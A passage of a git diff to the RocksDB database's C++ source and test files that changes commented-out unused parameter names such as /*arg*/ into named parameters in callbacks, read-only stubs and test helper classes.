{"DBCompaction::PartialFill:2", "DBCompaction::PartialFill:3"}}); rocksdb::SyncPoint::GetInstance()->SetCallBack( - "DBImpl::BackgroundCompaction:NonTrivial:AfterRun", [&](void* /*arg*/) { + "DBImpl::BackgroundCompaction:NonTrivial:AfterRun", [&](void* arg) { if (first) { TEST_SYNC_POINT("DBCompaction::PartialFill:4"); first = false; @@ -1444,10 +1444,10 @@ TEST_P(DBCompactionTestWithParam, TrivialMoveToLastLevelWithFiles) { int32_t non_trivial_move = 0; rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::BackgroundCompaction:TrivialMove", - [&](void* /*arg*/) { trivial_move++; }); + [&](void* arg) { trivial_move++; }); rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::BackgroundCompaction:NonTrivial", - [&](void* /*arg*/) { non_trivial_move++; }); + [&](void* arg) { non_trivial_move++; }); rocksdb::SyncPoint::GetInstance()->EnableProcessing(); Options options = CurrentOptions(); @@ -2325,16 +2325,16 @@ TEST_P(DBCompactionTestWithParam, CompressLevelCompaction) { rocksdb::SyncPoint::GetInstance()->SetCallBack( "Compaction::InputCompressionMatchesOutput:Matches", - [&](void* /*arg*/) { matches++; }); + [&](void* arg) { matches++; }); rocksdb::SyncPoint::GetInstance()->SetCallBack( "Compaction::InputCompressionMatchesOutput:DidntMatch", - [&](void* /*arg*/) { didnt_match++; }); + [&](void* arg) { didnt_match++; }); rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::BackgroundCompaction:NonTrivial", - [&](void* /*arg*/) { non_trivial++; }); + [&](void* arg) { non_trivial++; }); rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::BackgroundCompaction:TrivialMove", - [&](void* /*arg*/) { trivial_move++; }); + [&](void* arg) { trivial_move++; }); rocksdb::SyncPoint::GetInstance()->EnableProcessing(); Reopen(options); @@ -2496,10 +2496,10 @@ TEST_P(DBCompactionTestWithParam, ForceBottommostLevelCompaction) { int32_t non_trivial_move = 0; rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::BackgroundCompaction:TrivialMove", - [&](void* /*arg*/) { trivial_move++; }); + [&](void* arg) { trivial_move++; }); rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::BackgroundCompaction:NonTrivial", - [&](void* /*arg*/) { non_trivial_move++; }); + [&](void* arg) { non_trivial_move++; }); rocksdb::SyncPoint::GetInstance()->EnableProcessing(); Options options = CurrentOptions(); @@ -2656,7 +2656,9 @@ TEST_P(DBCompactionDirectIOTest, DirectIO) { }); if (options.use_direct_io_for_flush_and_compaction) { SyncPoint::GetInstance()->SetCallBack( - "SanitizeOptions:direct_io", [&](void* /*arg*/) { readahead = true; }); + "SanitizeOptions:direct_io", [&](void* arg) { + readahead = true; + }); } SyncPoint::GetInstance()->EnableProcessing(); CreateAndReopenWithCF({"pikachu"}, options); diff --git a/db/db_dynamic_level_test.cc b/db/db_dynamic_level_test.cc index 6542db18c02..f968e7fc057 100644 --- a/db/db_dynamic_level_test.cc +++ b/db/db_dynamic_level_test.cc @@ -194,7 +194,7 @@ TEST_F(DBTestDynamicLevel, DynamicLevelMaxBytesBase2) { // Hold compaction jobs to make sure rocksdb::SyncPoint::GetInstance()->SetCallBack( "CompactionJob::Run():Start", - [&](void* /*arg*/) { env_->SleepForMicroseconds(100000); }); + [&](void* arg) { env_->SleepForMicroseconds(100000); }); rocksdb::SyncPoint::GetInstance()->EnableProcessing(); ASSERT_OK(dbfull()->SetOptions({ {"disable_auto_compactions", "true"}, @@ -378,7 +378,7 @@ TEST_F(DBTestDynamicLevel, DynamicLevelMaxBytesBaseInc) { int non_trivial = 0; rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::BackgroundCompaction:NonTrivial", - [&](void* 
/*arg*/) { non_trivial++; }); + [&](void* arg) { non_trivial++; }); rocksdb::SyncPoint::GetInstance()->EnableProcessing(); Random rnd(301); diff --git a/db/db_flush_test.cc b/db/db_flush_test.cc index 0dab8bfe59a..107e82467cb 100644 --- a/db/db_flush_test.cc +++ b/db/db_flush_test.cc @@ -101,7 +101,7 @@ TEST_F(DBFlushTest, FlushInLowPriThreadPool) { std::thread::id tid; int num_flushes = 0, num_compactions = 0; SyncPoint::GetInstance()->SetCallBack( - "DBImpl::BGWorkFlush", [&](void* /*arg*/) { + "DBImpl::BGWorkFlush", [&](void* arg) { if (tid == std::thread::id()) { tid = std::this_thread::get_id(); } else { @@ -110,7 +110,7 @@ TEST_F(DBFlushTest, FlushInLowPriThreadPool) { ++num_flushes; }); SyncPoint::GetInstance()->SetCallBack( - "DBImpl::BGWorkCompaction", [&](void* /*arg*/) { + "DBImpl::BGWorkCompaction", [&](void* arg) { ASSERT_EQ(tid, std::this_thread::get_id()); ++num_compactions; }); diff --git a/db/db_impl.cc b/db/db_impl.cc index 97f9b202405..f770b51ae7f 100644 --- a/db/db_impl.cc +++ b/db/db_impl.cc @@ -595,9 +595,8 @@ Status DBImpl::SetDBOptions( } // return the same level if it cannot be moved -int DBImpl::FindMinimumEmptyLevelFitting( - ColumnFamilyData* cfd, const MutableCFOptions& /*mutable_cf_options*/, - int level) { +int DBImpl::FindMinimumEmptyLevelFitting(ColumnFamilyData* cfd, + const MutableCFOptions& mutable_cf_options, int level) { mutex_.AssertHeld(); const auto* vstorage = cfd->current()->storage_info(); int minimum_level = level; @@ -807,7 +806,7 @@ struct IterState { bool background_purge; }; -static void CleanupIteratorState(void* arg1, void* /*arg2*/) { +static void CleanupIteratorState(void* arg1, void* arg2) { IterState* state = reinterpret_cast(arg1); if (state->super_version->Unref()) { @@ -2191,31 +2190,31 @@ Status DBImpl::GetDbIdentity(std::string& identity) const { } // Default implementation -- returns not supported status -Status DB::CreateColumnFamily(const ColumnFamilyOptions& /*cf_options*/, - const std::string& /*column_family_name*/, - ColumnFamilyHandle** /*handle*/) { +Status DB::CreateColumnFamily(const ColumnFamilyOptions& cf_options, + const std::string& column_family_name, + ColumnFamilyHandle** handle) { return Status::NotSupported(""); } Status DB::CreateColumnFamilies( - const ColumnFamilyOptions& /*cf_options*/, - const std::vector& /*column_family_names*/, - std::vector* /*handles*/) { + const ColumnFamilyOptions& cf_options, + const std::vector& column_family_names, + std::vector* handles) { return Status::NotSupported(""); } Status DB::CreateColumnFamilies( - const std::vector& /*column_families*/, - std::vector* /*handles*/) { + const std::vector& column_families, + std::vector* handles) { return Status::NotSupported(""); } -Status DB::DropColumnFamily(ColumnFamilyHandle* /*column_family*/) { +Status DB::DropColumnFamily(ColumnFamilyHandle* column_family) { return Status::NotSupported(""); } Status DB::DropColumnFamilies( - const std::vector& /*column_families*/) { + const std::vector& column_families) { return Status::NotSupported(""); } diff --git a/db/db_impl_compaction_flush.cc b/db/db_impl_compaction_flush.cc index e04fc6ee93e..68d2831233b 100644 --- a/db/db_impl_compaction_flush.cc +++ b/db/db_impl_compaction_flush.cc @@ -779,7 +779,7 @@ int DBImpl::NumberLevels(ColumnFamilyHandle* column_family) { return cfh->cfd()->NumberLevels(); } -int DBImpl::MaxMemCompactionLevel(ColumnFamilyHandle* /*column_family*/) { +int DBImpl::MaxMemCompactionLevel(ColumnFamilyHandle* column_family) { return 0; } diff --git 
a/db/db_impl_readonly.cc b/db/db_impl_readonly.cc index e3970306572..d4fe7e702f8 100644 --- a/db/db_impl_readonly.cc +++ b/db/db_impl_readonly.cc @@ -105,7 +105,7 @@ Status DBImplReadOnly::NewIterators( } Status DB::OpenForReadOnly(const Options& options, const std::string& dbname, - DB** dbptr, bool /*error_if_log_file_exist*/) { + DB** dbptr, bool error_if_log_file_exist) { *dbptr = nullptr; // Try to first open DB as fully compacted DB diff --git a/db/db_impl_readonly.h b/db/db_impl_readonly.h index 35f2d1c8586..9bdc95cc874 100644 --- a/db/db_impl_readonly.h +++ b/db/db_impl_readonly.h @@ -36,47 +36,46 @@ class DBImplReadOnly : public DBImpl { std::vector* iterators) override; using DBImpl::Put; - virtual Status Put(const WriteOptions& /*options*/, - ColumnFamilyHandle* /*column_family*/, - const Slice& /*key*/, const Slice& /*value*/) override { + virtual Status Put(const WriteOptions& options, + ColumnFamilyHandle* column_family, const Slice& key, + const Slice& value) override { return Status::NotSupported("Not supported operation in read only mode."); } using DBImpl::Merge; - virtual Status Merge(const WriteOptions& /*options*/, - ColumnFamilyHandle* /*column_family*/, - const Slice& /*key*/, const Slice& /*value*/) override { + virtual Status Merge(const WriteOptions& options, + ColumnFamilyHandle* column_family, const Slice& key, + const Slice& value) override { return Status::NotSupported("Not supported operation in read only mode."); } using DBImpl::Delete; - virtual Status Delete(const WriteOptions& /*options*/, - ColumnFamilyHandle* /*column_family*/, - const Slice& /*key*/) override { + virtual Status Delete(const WriteOptions& options, + ColumnFamilyHandle* column_family, + const Slice& key) override { return Status::NotSupported("Not supported operation in read only mode."); } using DBImpl::SingleDelete; - virtual Status SingleDelete(const WriteOptions& /*options*/, - ColumnFamilyHandle* /*column_family*/, - const Slice& /*key*/) override { + virtual Status SingleDelete(const WriteOptions& options, + ColumnFamilyHandle* column_family, + const Slice& key) override { return Status::NotSupported("Not supported operation in read only mode."); } - virtual Status Write(const WriteOptions& /*options*/, - WriteBatch* /*updates*/) override { + virtual Status Write(const WriteOptions& options, + WriteBatch* updates) override { return Status::NotSupported("Not supported operation in read only mode."); } using DBImpl::CompactRange; - virtual Status CompactRange(const CompactRangeOptions& /*options*/, - ColumnFamilyHandle* /*column_family*/, - const Slice* /*begin*/, - const Slice* /*end*/) override { + virtual Status CompactRange(const CompactRangeOptions& options, + ColumnFamilyHandle* column_family, + const Slice* begin, const Slice* end) override { return Status::NotSupported("Not supported operation in read only mode."); } using DBImpl::CompactFiles; virtual Status CompactFiles( - const CompactionOptions& /*compact_options*/, - ColumnFamilyHandle* /*column_family*/, - const std::vector& /*input_file_names*/, - const int /*output_level*/, const int /*output_path_id*/ = -1) override { + const CompactionOptions& compact_options, + ColumnFamilyHandle* column_family, + const std::vector& input_file_names, + const int output_level, const int output_path_id = -1) override { return Status::NotSupported("Not supported operation in read only mode."); } @@ -84,18 +83,18 @@ class DBImplReadOnly : public DBImpl { return Status::NotSupported("Not supported operation in read only mode."); } - 
virtual Status EnableFileDeletions(bool /*force*/) override { + virtual Status EnableFileDeletions(bool force) override { return Status::NotSupported("Not supported operation in read only mode."); } virtual Status GetLiveFiles(std::vector<std::string>&, - uint64_t* /*manifest_file_size*/, - bool /*flush_memtable*/ = true) override { + uint64_t* manifest_file_size, + bool flush_memtable = true) override { return Status::NotSupported("Not supported operation in read only mode."); } using DBImpl::Flush; - virtual Status Flush(const FlushOptions& /*options*/, - ColumnFamilyHandle* /*column_family*/) override { + virtual Status Flush(const FlushOptions& options, + ColumnFamilyHandle* column_family) override { return Status::NotSupported("Not supported operation in read only mode."); } @@ -106,9 +105,9 @@ class DBImplReadOnly : public DBImpl { using DB::IngestExternalFile; virtual Status IngestExternalFile( - ColumnFamilyHandle* /*column_family*/, - const std::vector<std::string>& /*external_files*/, - const IngestExternalFileOptions& /*ingestion_options*/) override { + ColumnFamilyHandle* column_family, + const std::vector<std::string>& external_files, + const IngestExternalFileOptions& ingestion_options) override { return Status::NotSupported("Not supported operation in read only mode."); } diff --git a/db/db_impl_write.cc b/db/db_impl_write.cc index 2579cc87cfd..f52bce611a9 100644 --- a/db/db_impl_write.cc +++ b/db/db_impl_write.cc @@ -1002,7 +1002,7 @@ Status DBImpl::ScheduleFlushes(WriteContext* context) { } #ifndef ROCKSDB_LITE -void DBImpl::NotifyOnMemTableSealed(ColumnFamilyData* /*cfd*/, +void DBImpl::NotifyOnMemTableSealed(ColumnFamilyData* cfd, const MemTableInfo& mem_table_info) { if (immutable_db_options_.listeners.size() == 0U) { return; diff --git a/db/db_iter_test.cc b/db/db_iter_test.cc index 88493ccfbfb..1b7c13b06f3 100644 --- a/db/db_iter_test.cc +++ b/db/db_iter_test.cc @@ -2459,7 +2459,7 @@ TEST_F(DBIterWithMergeIterTest, InnerMergeIteratorDataRace1) { // and before a SeekToLast() is called. rocksdb::SyncPoint::GetInstance()->SetCallBack( "MergeIterator::Prev:BeforeSeekToLast", - [&](void* /*arg*/) { internal_iter2_->Add("z", kTypeValue, "7", 12u); }); + [&](void* arg) { internal_iter2_->Add("z", kTypeValue, "7", 12u); }); rocksdb::SyncPoint::GetInstance()->EnableProcessing(); db_iter_->Prev(); @@ -2494,7 +2494,7 @@ TEST_F(DBIterWithMergeIterTest, InnerMergeIteratorDataRace2) { // mem table after MergeIterator::Prev() realized the mem table iterator is at // its end and before a SeekToLast() is called. rocksdb::SyncPoint::GetInstance()->SetCallBack( - "MergeIterator::Prev:BeforeSeekToLast", [&](void* /*arg*/) { + "MergeIterator::Prev:BeforeSeekToLast", [&](void* arg) { internal_iter2_->Add("z", kTypeValue, "7", 12u); internal_iter2_->Add("z", kTypeValue, "7", 11u); }); @@ -2532,7 +2532,7 @@ TEST_F(DBIterWithMergeIterTest, InnerMergeIteratorDataRace3) { // mem table after MergeIterator::Prev() realized the mem table iterator is at // its end and before a SeekToLast() is called.
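Most hunks in the test files above touch one internal pattern: registering a counting callback on a named sync point. Condensed, the pattern is as follows (util/sync_point.h is an in-tree test header, so this compiles only inside the RocksDB tree; the two marker names are real ones used above):

#include "util/sync_point.h"

void CountCompactionKinds() {
  int trivial_move = 0;
  int non_trivial_move = 0;
  auto* sp = rocksdb::SyncPoint::GetInstance();
  // The lambda runs every time the named marker is reached in the DB code.
  sp->SetCallBack("DBImpl::BackgroundCompaction:TrivialMove",
                  [&](void* /*arg*/) { trivial_move++; });
  sp->SetCallBack("DBImpl::BackgroundCompaction:NonTrivial",
                  [&](void* /*arg*/) { non_trivial_move++; });
  sp->EnableProcessing();
  // ... write data and trigger compactions here ...
  sp->DisableProcessing();
  sp->ClearAllCallBacks();
}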
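The LoadDependency calls above (the ManualPartial and PartialFill pairs) order concurrent code paths rather than count them. A sketch of the mechanism, with invented marker names; each {"A", "B"} pair makes execution block at sync point "B" until point "A" has been passed:

#include "util/sync_point.h"

void OrderTwoThreads() {
  rocksdb::SyncPoint::GetInstance()->LoadDependency(
      {{"Thread1:DidWork", "Thread2:BeforeCheck"}});
  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
  // Thread 1 executes:  TEST_SYNC_POINT("Thread1:DidWork");
  // Thread 2 blocks at: TEST_SYNC_POINT("Thread2:BeforeCheck");
  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
}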
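The DBImplReadOnly overrides above all collapse to Status::NotSupported. From the caller's side that looks like this (the path and keys are illustrative):

#include <cassert>
#include <string>
#include "rocksdb/db.h"

void ReadOnlySketch() {
  rocksdb::DB* db = nullptr;
  rocksdb::Options options;
  rocksdb::Status s =
      rocksdb::DB::OpenForReadOnly(options, "/tmp/testdb", &db);
  if (!s.ok()) return;
  std::string value;
  s = db->Get(rocksdb::ReadOptions(), "some_key", &value);  // reads work
  s = db->Put(rocksdb::WriteOptions(), "k", "v");           // mutations fail
  assert(s.IsNotSupported());
  delete db;
}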
rocksdb::SyncPoint::GetInstance()->SetCallBack( - "MergeIterator::Prev:BeforeSeekToLast", [&](void* /*arg*/) { + "MergeIterator::Prev:BeforeSeekToLast", [&](void* arg) { internal_iter2_->Add("z", kTypeValue, "7", 16u, true); internal_iter2_->Add("z", kTypeValue, "7", 15u, true); internal_iter2_->Add("z", kTypeValue, "7", 14u, true); diff --git a/db/db_iterator_test.cc b/db/db_iterator_test.cc index 9d344e7af86..90f43ea374d 100644 --- a/db/db_iterator_test.cc +++ b/db/db_iterator_test.cc @@ -24,7 +24,7 @@ class DBIteratorTest : public DBTestBase { class FlushBlockEveryKeyPolicy : public FlushBlockPolicy { public: - virtual bool Update(const Slice& /*key*/, const Slice& /*value*/) override { + virtual bool Update(const Slice& key, const Slice& value) override { if (!start_) { start_ = true; return false; @@ -44,8 +44,8 @@ class FlushBlockEveryKeyPolicyFactory : public FlushBlockPolicyFactory { } FlushBlockPolicy* NewFlushBlockPolicy( - const BlockBasedTableOptions& /*table_options*/, - const BlockBuilder& /*data_block_builder*/) const override { + const BlockBasedTableOptions& table_options, + const BlockBuilder& data_block_builder) const override { return new FlushBlockEveryKeyPolicy; } }; diff --git a/db/db_memtable_test.cc b/db/db_memtable_test.cc index 5ce3e319122..63d274f6ab5 100644 --- a/db/db_memtable_test.cc +++ b/db/db_memtable_test.cc @@ -121,7 +121,7 @@ class TestPrefixExtractor : public SliceTransform { return separator(key) != nullptr; } - virtual bool InRange(const Slice& /*key*/) const override { return false; } + virtual bool InRange(const Slice& key) const override { return false; } private: const char* separator(const Slice& key) const { diff --git a/db/db_properties_test.cc b/db/db_properties_test.cc index 2b099a39a45..b09fe1ffacc 100644 --- a/db/db_properties_test.cc +++ b/db/db_properties_test.cc @@ -985,9 +985,8 @@ class CountingUserTblPropCollector : public TablePropertiesCollector { return Status::OK(); } - Status AddUserKey(const Slice& /*user_key*/, const Slice& /*value*/, - EntryType /*type*/, SequenceNumber /*seq*/, - uint64_t /*file_size*/) override { + Status AddUserKey(const Slice& user_key, const Slice& value, EntryType type, + SequenceNumber seq, uint64_t file_size) override { ++count_; return Status::OK(); } @@ -1028,9 +1027,8 @@ class CountingDeleteTabPropCollector : public TablePropertiesCollector { public: const char* Name() const override { return "CountingDeleteTabPropCollector"; } - Status AddUserKey(const Slice& /*user_key*/, const Slice& /*value*/, - EntryType type, SequenceNumber /*seq*/, - uint64_t /*file_size*/) override { + Status AddUserKey(const Slice& user_key, const Slice& value, EntryType type, + SequenceNumber seq, uint64_t file_size) override { if (type == kEntryDelete) { num_deletes_++; } @@ -1057,7 +1055,7 @@ class CountingDeleteTabPropCollectorFactory : public TablePropertiesCollectorFactory { public: virtual TablePropertiesCollector* CreateTablePropertiesCollector( - TablePropertiesCollectorFactory::Context /*context*/) override { + TablePropertiesCollectorFactory::Context context) override { return new CountingDeleteTabPropCollector(); } const char* Name() const override { diff --git a/db/db_sst_test.cc b/db/db_sst_test.cc index 9427e0b5c98..73c6fe8016d 100644 --- a/db/db_sst_test.cc +++ b/db/db_sst_test.cc @@ -231,12 +231,11 @@ TEST_F(DBSSTTest, DBWithSstFileManager) { int files_deleted = 0; int files_moved = 0; rocksdb::SyncPoint::GetInstance()->SetCallBack( - "SstFileManagerImpl::OnAddFile", [&](void* /*arg*/) { files_added++; }); 
+ "SstFileManagerImpl::OnAddFile", [&](void* arg) { files_added++; }); rocksdb::SyncPoint::GetInstance()->SetCallBack( - "SstFileManagerImpl::OnDeleteFile", - [&](void* /*arg*/) { files_deleted++; }); + "SstFileManagerImpl::OnDeleteFile", [&](void* arg) { files_deleted++; }); rocksdb::SyncPoint::GetInstance()->SetCallBack( - "SstFileManagerImpl::OnMoveFile", [&](void* /*arg*/) { files_moved++; }); + "SstFileManagerImpl::OnMoveFile", [&](void* arg) { files_moved++; }); rocksdb::SyncPoint::GetInstance()->EnableProcessing(); Options options = CurrentOptions(); @@ -386,7 +385,7 @@ TEST_F(DBSSTTest, DeleteSchedulerMultipleDBPaths) { int bg_delete_file = 0; rocksdb::SyncPoint::GetInstance()->SetCallBack( "DeleteScheduler::DeleteTrashFile:DeleteFile", - [&](void* /*arg*/) { bg_delete_file++; }); + [&](void* arg) { bg_delete_file++; }); rocksdb::SyncPoint::GetInstance()->EnableProcessing(); Options options = CurrentOptions(); @@ -454,7 +453,7 @@ TEST_F(DBSSTTest, DestroyDBWithRateLimitedDelete) { int bg_delete_file = 0; rocksdb::SyncPoint::GetInstance()->SetCallBack( "DeleteScheduler::DeleteTrashFile:DeleteFile", - [&](void* /*arg*/) { bg_delete_file++; }); + [&](void* arg) { bg_delete_file++; }); rocksdb::SyncPoint::GetInstance()->EnableProcessing(); Status s; @@ -547,7 +546,7 @@ TEST_F(DBSSTTest, DBWithMaxSpaceAllowedRandomized) { rocksdb::SyncPoint::GetInstance()->SetCallBack( "CompactionJob::FinishCompactionOutputFile:MaxAllowedSpaceReached", - [&](void* /*arg*/) { + [&](void* arg) { bg_error_set = true; GetAllSSTFiles(&total_sst_files_size); reached_max_space_on_compaction++; diff --git a/db/db_tailing_iter_test.cc b/db/db_tailing_iter_test.cc index 8301d5a92d4..d217828db9d 100644 --- a/db/db_tailing_iter_test.cc +++ b/db/db_tailing_iter_test.cc @@ -157,10 +157,10 @@ TEST_F(DBTestTailingIterator, TailingIteratorTrimSeekToNext) { }); rocksdb::SyncPoint::GetInstance()->SetCallBack( "ForwardIterator::RenewIterators:Null", - [&](void* /*arg*/) { file_iters_renewed_null = true; }); + [&](void* arg) { file_iters_renewed_null = true; }); rocksdb::SyncPoint::GetInstance()->SetCallBack( "ForwardIterator::RenewIterators:Copy", - [&](void* /*arg*/) { file_iters_renewed_copy = true; }); + [&](void* arg) { file_iters_renewed_copy = true; }); rocksdb::SyncPoint::GetInstance()->EnableProcessing(); const int num_records = 1000; for (int i = 1; i < num_records; ++i) { @@ -415,7 +415,7 @@ TEST_F(DBTestTailingIterator, TailingIteratorUpperBound) { int immutable_seeks = 0; rocksdb::SyncPoint::GetInstance()->SetCallBack( "ForwardIterator::SeekInternal:Immutable", - [&](void* /*arg*/) { ++immutable_seeks; }); + [&](void* arg) { ++immutable_seeks; }); // Seek to 13. This should not require any immutable seeks. 
rocksdb::SyncPoint::GetInstance()->EnableProcessing(); diff --git a/db/db_test.cc b/db/db_test.cc index 16d6580bbd3..e9840faa042 100644 --- a/db/db_test.cc +++ b/db/db_test.cc @@ -231,11 +231,11 @@ TEST_F(DBTest, SkipDelay) { std::atomic sleep_count(0); rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::DelayWrite:Sleep", - [&](void* /*arg*/) { sleep_count.fetch_add(1); }); + [&](void* arg) { sleep_count.fetch_add(1); }); std::atomic wait_count(0); rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::DelayWrite:Wait", - [&](void* /*arg*/) { wait_count.fetch_add(1); }); + [&](void* arg) { wait_count.fetch_add(1); }); rocksdb::SyncPoint::GetInstance()->EnableProcessing(); WriteOptions wo; @@ -715,9 +715,9 @@ TEST_F(DBTest, FlushSchedule) { namespace { class KeepFilter : public CompactionFilter { public: - virtual bool Filter(int /*level*/, const Slice& /*key*/, - const Slice& /*value*/, std::string* /*new_value*/, - bool* /*value_changed*/) const override { + virtual bool Filter(int level, const Slice& key, const Slice& value, + std::string* new_value, + bool* value_changed) const override { return false; } @@ -747,9 +747,9 @@ class KeepFilterFactory : public CompactionFilterFactory { class DelayFilter : public CompactionFilter { public: explicit DelayFilter(DBTestBase* d) : db_test(d) {} - virtual bool Filter(int /*level*/, const Slice& /*key*/, - const Slice& /*value*/, std::string* /*new_value*/, - bool* /*value_changed*/) const override { + virtual bool Filter(int level, const Slice& key, const Slice& value, + std::string* new_value, + bool* value_changed) const override { db_test->env_->addon_time_.fetch_add(1000); return true; } @@ -764,7 +764,7 @@ class DelayFilterFactory : public CompactionFilterFactory { public: explicit DelayFilterFactory(DBTestBase* d) : db_test(d) {} virtual std::unique_ptr CreateCompactionFilter( - const CompactionFilter::Context& /*context*/) override { + const CompactionFilter::Context& context) override { return std::unique_ptr(new DelayFilter(db_test)); } @@ -2210,17 +2210,17 @@ class ModelDB : public DB { return Write(o, &batch); } using DB::Get; - virtual Status Get(const ReadOptions& /*options*/, ColumnFamilyHandle* /*cf*/, - const Slice& key, PinnableSlice* /*value*/) override { + virtual Status Get(const ReadOptions& options, ColumnFamilyHandle* cf, + const Slice& key, PinnableSlice* value) override { return Status::NotSupported(key); } using DB::MultiGet; virtual std::vector MultiGet( - const ReadOptions& /*options*/, - const std::vector& /*column_family*/, + const ReadOptions& options, + const std::vector& column_family, const std::vector& keys, - std::vector* /*values*/) override { + std::vector* values) override { std::vector s(keys.size(), Status::NotSupported("Not implemented.")); return s; @@ -2229,30 +2229,30 @@ class ModelDB : public DB { #ifndef ROCKSDB_LITE using DB::IngestExternalFile; virtual Status IngestExternalFile( - ColumnFamilyHandle* /*column_family*/, - const std::vector& /*external_files*/, - const IngestExternalFileOptions& /*options*/) override { + ColumnFamilyHandle* column_family, + const std::vector& external_files, + const IngestExternalFileOptions& options) override { return Status::NotSupported("Not implemented."); } using DB::GetPropertiesOfAllTables; virtual Status GetPropertiesOfAllTables( - ColumnFamilyHandle* /*column_family*/, - TablePropertiesCollection* /*props*/) override { + ColumnFamilyHandle* column_family, + TablePropertiesCollection* props) override { return Status(); } virtual Status 
GetPropertiesOfTablesInRange( - ColumnFamilyHandle* /*column_family*/, const Range* /*range*/, - std::size_t /*n*/, TablePropertiesCollection* /*props*/) override { + ColumnFamilyHandle* column_family, const Range* range, std::size_t n, + TablePropertiesCollection* props) override { return Status(); } #endif // ROCKSDB_LITE using DB::KeyMayExist; - virtual bool KeyMayExist(const ReadOptions& /*options*/, - ColumnFamilyHandle* /*column_family*/, - const Slice& /*key*/, std::string* /*value*/, + virtual bool KeyMayExist(const ReadOptions& options, + ColumnFamilyHandle* column_family, const Slice& key, + std::string* value, bool* value_found = nullptr) override { if (value_found != nullptr) { *value_found = false; @@ -2260,9 +2260,8 @@ class ModelDB : public DB { return true; // Not Supported directly } using DB::NewIterator; - virtual Iterator* NewIterator( - const ReadOptions& options, - ColumnFamilyHandle* /*column_family*/) override { + virtual Iterator* NewIterator(const ReadOptions& options, + ColumnFamilyHandle* column_family) override { if (options.snapshot == nullptr) { KVMap* saved = new KVMap; *saved = map_; @@ -2274,9 +2273,9 @@ class ModelDB : public DB { } } virtual Status NewIterators( - const ReadOptions& /*options*/, - const std::vector& /*column_family*/, - std::vector* /*iterators*/) override { + const ReadOptions& options, + const std::vector& column_family, + std::vector* iterators) override { return Status::NotSupported("Not supported yet"); } virtual const Snapshot* GetSnapshot() override { @@ -2289,7 +2288,7 @@ class ModelDB : public DB { delete reinterpret_cast(snapshot); } - virtual Status Write(const WriteOptions& /*options*/, + virtual Status Write(const WriteOptions& options, WriteBatch* batch) override { class Handler : public WriteBatch::Handler { public: @@ -2297,8 +2296,7 @@ class ModelDB : public DB { virtual void Put(const Slice& key, const Slice& value) override { (*map_)[key.ToString()] = value.ToString(); } - virtual void Merge(const Slice& /*key*/, - const Slice& /*value*/) override { + virtual void Merge(const Slice& key, const Slice& value) override { // ignore merge for now // (*map_)[key.ToString()] = value.ToString(); } @@ -2312,65 +2310,62 @@ class ModelDB : public DB { } using DB::GetProperty; - virtual bool GetProperty(ColumnFamilyHandle* /*column_family*/, - const Slice& /*property*/, - std::string* /*value*/) override { + virtual bool GetProperty(ColumnFamilyHandle* column_family, + const Slice& property, std::string* value) override { return false; } using DB::GetIntProperty; - virtual bool GetIntProperty(ColumnFamilyHandle* /*column_family*/, - const Slice& /*property*/, - uint64_t* /*value*/) override { + virtual bool GetIntProperty(ColumnFamilyHandle* column_family, + const Slice& property, uint64_t* value) override { return false; } using DB::GetMapProperty; - virtual bool GetMapProperty( - ColumnFamilyHandle* /*column_family*/, const Slice& /*property*/, - std::map* /*value*/) override { + virtual bool GetMapProperty(ColumnFamilyHandle* column_family, + const Slice& property, + std::map* value) override { return false; } using DB::GetAggregatedIntProperty; - virtual bool GetAggregatedIntProperty(const Slice& /*property*/, - uint64_t* /*value*/) override { + virtual bool GetAggregatedIntProperty(const Slice& property, + uint64_t* value) override { return false; } using DB::GetApproximateSizes; - virtual void GetApproximateSizes(ColumnFamilyHandle* /*column_family*/, - const Range* /*range*/, int n, - uint64_t* sizes, - uint8_t 
/*include_flags*/ + virtual void GetApproximateSizes(ColumnFamilyHandle* column_family, + const Range* range, int n, uint64_t* sizes, + uint8_t include_flags = INCLUDE_FILES) override { for (int i = 0; i < n; i++) { sizes[i] = 0; } } using DB::GetApproximateMemTableStats; - virtual void GetApproximateMemTableStats( - ColumnFamilyHandle* /*column_family*/, const Range& /*range*/, - uint64_t* const count, uint64_t* const size) override { + virtual void GetApproximateMemTableStats(ColumnFamilyHandle* column_family, + const Range& range, + uint64_t* const count, + uint64_t* const size) override { *count = 0; *size = 0; } using DB::CompactRange; - virtual Status CompactRange(const CompactRangeOptions& /*options*/, - ColumnFamilyHandle* /*column_family*/, - const Slice* /*start*/, - const Slice* /*end*/) override { + virtual Status CompactRange(const CompactRangeOptions& options, + ColumnFamilyHandle* column_family, + const Slice* start, const Slice* end) override { return Status::NotSupported("Not supported operation."); } virtual Status SetDBOptions( - const std::unordered_map& /*new_options*/) + const std::unordered_map& new_options) override { return Status::NotSupported("Not supported operation."); } using DB::CompactFiles; - virtual Status CompactFiles( - const CompactionOptions& /*compact_options*/, - ColumnFamilyHandle* /*column_family*/, - const std::vector& /*input_file_names*/, - const int /*output_level*/, const int /*output_path_id*/ = -1) override { + virtual Status CompactFiles(const CompactionOptions& compact_options, + ColumnFamilyHandle* column_family, + const std::vector& input_file_names, + const int output_level, + const int output_path_id = -1) override { return Status::NotSupported("Not supported operation."); } @@ -2383,25 +2378,24 @@ class ModelDB : public DB { } Status EnableAutoCompaction( - const std::vector& /*column_family_handles*/) - override { + const std::vector& column_family_handles) override { return Status::NotSupported("Not supported operation."); } using DB::NumberLevels; - virtual int NumberLevels(ColumnFamilyHandle* /*column_family*/) override { + virtual int NumberLevels(ColumnFamilyHandle* column_family) override { return 1; } using DB::MaxMemCompactionLevel; virtual int MaxMemCompactionLevel( - ColumnFamilyHandle* /*column_family*/) override { + ColumnFamilyHandle* column_family) override { return 1; } using DB::Level0StopWriteTrigger; virtual int Level0StopWriteTrigger( - ColumnFamilyHandle* /*column_family*/) override { + ColumnFamilyHandle* column_family) override { return -1; } @@ -2410,8 +2404,7 @@ class ModelDB : public DB { virtual Env* GetEnv() const override { return nullptr; } using DB::GetOptions; - virtual Options GetOptions( - ColumnFamilyHandle* /*column_family*/) const override { + virtual Options 